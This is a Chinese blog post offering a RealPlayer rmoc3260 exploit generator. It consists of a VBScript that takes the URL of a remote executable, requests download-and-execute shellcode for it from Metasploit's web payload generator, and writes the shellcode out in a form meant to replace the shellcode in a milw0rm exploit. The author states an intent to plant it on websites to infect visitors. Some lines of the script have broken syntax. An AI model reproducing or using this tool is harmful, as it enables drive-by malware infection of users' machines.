milw0rm上的,生成器
lcx给的,稍微改了改代码,据说好用
未测试,最近忙到自杀的时间都没有
唉,可惜有马时候没洞,有洞时候没马,要不就找个站挂上了。

http://www.blogjava.net/Files/baicker/Real_Player_rmoc3260_exp.rar


以下原vbs文件:
' 以下代码保存成vbs,双击即可

On   Error   Resume   Next
Exeurl  =   InputBox " 请输入exe的地址: " " 输入 " " http://www.haiyangtop.net/333.exe "  )
url  =   " http://metasploit.com:55555/PAYLOADS?parent=GLOB%280x2b94a2879c50%29&MODULE=win32_downloadexec&MODE=GENERATE&OPT_URL= " & URLEncoding(Exeurl) & " &MaxSize=&BadChars=0x00+&ENCODER=Msf%3A%3AEncoder%3A%3AAlpha2&ACTION=Generate+Payload "
Body  =  getHTTPPage(url)
 Set  Re  =   New  RegExp
Re.Pattern  =   " (\$shellcode \=[\s\S]+</div></pre>) "
Set  Matches  =  Re.Execute(Body)
 If  Matches.Count > 0   Then  Body  =  Matches( 0 ).value
code = Trim ( Replace ( Replace ( replace ( Replace ( Replace ( Replace ( Replace (Body, " $shellcode = " , "" ), Chr ( 34 ), "" ), Chr ( 13 ), "" ), " ; " , "" ), " </div></pre> " , "" ), Chr ( 10 ), "" ), " . " , "" ))

 function  replaceregex(str)
 set  regex = new  regExp
regex.pattern = " \\x(..)\\x(..) "
regex.IgnoreCase = true
regex.global = true
matches = regex.replace(str, " %u$2$1 " )
replaceregex = matches
 end Function

Function  getHTTPPage(Path)
 t  =  GetBody(Path)
 getHTTPPage  =  BytesToBstr(t,  " GB2312 " )
 End Function

Function  GetBody(url)
  On   Error   Resume   Next
  Set  Retrieval  =   CreateObject ( " Microsoft.XMLHTTP " )
  With  Retrieval
 .Open  " Get " , url,  False "" ""
 .Send
 GetBody  =  .ResponseBody
  End   With
  Set  Retrieval  =   Nothing
End Function

Function  BytesToBstr(Body, Cset)
  Dim  objstream
  Set  objstream  =   CreateObject ( " adodb.stream " )
 objstream.Type  =   1
 objstream.Mode  =   3
 objstream.Open
 objstream.Write Body
 objstream.Position  =   0
 objstream.Type  =   2
 objstream.Charset  =  Cset
 BytesToBstr  =  objstream.ReadText
 objstream.Close
  Set  objstream  =   Nothing
End Function

Function  URLEncoding(vstrIn)
 strReturn  =   ""
  For  aaaa  =   1   To   Len (vstrIn)
 ThisChr  =   Mid (vStrIn,aaaa, 1 )
  If   Abs ( Asc (ThisChr))  <   & HFF  Then
 strReturn  =  strReturn  &  ThisChr
  Else
 innerCode  =   Asc (ThisChr)
  If  innerCode  <   0   Then
 innerCode  =  innerCode  +   & H10000
  End   If
 Hight8  =  (innerCode  And   & HFF00) \   & HFF
 Low8  =  innerCode  And   & HFF
 strReturn  =  strReturn  &   " % "   &   Hex (Hight8)  &   " % "   &   Hex (Low8)
  End   If
  Next
 URLEncoding  =  strReturn
 End Function

set  fso = CreateObject ( " scripting.filesystemobject " )
 set  fileS = fso.opentextfile( " a.txt " , 8 , true )
fileS.writeline replaceregex(code)
wscript.echo replaceregex(code)
files.close
 set  fso = Nothing
wscript.echo  Chr ( 13 ) & " ok,生成a.txt,请用a.txt里的替换http://www.milw0rm.com/exploits/5332里的shellcode1内容即可 "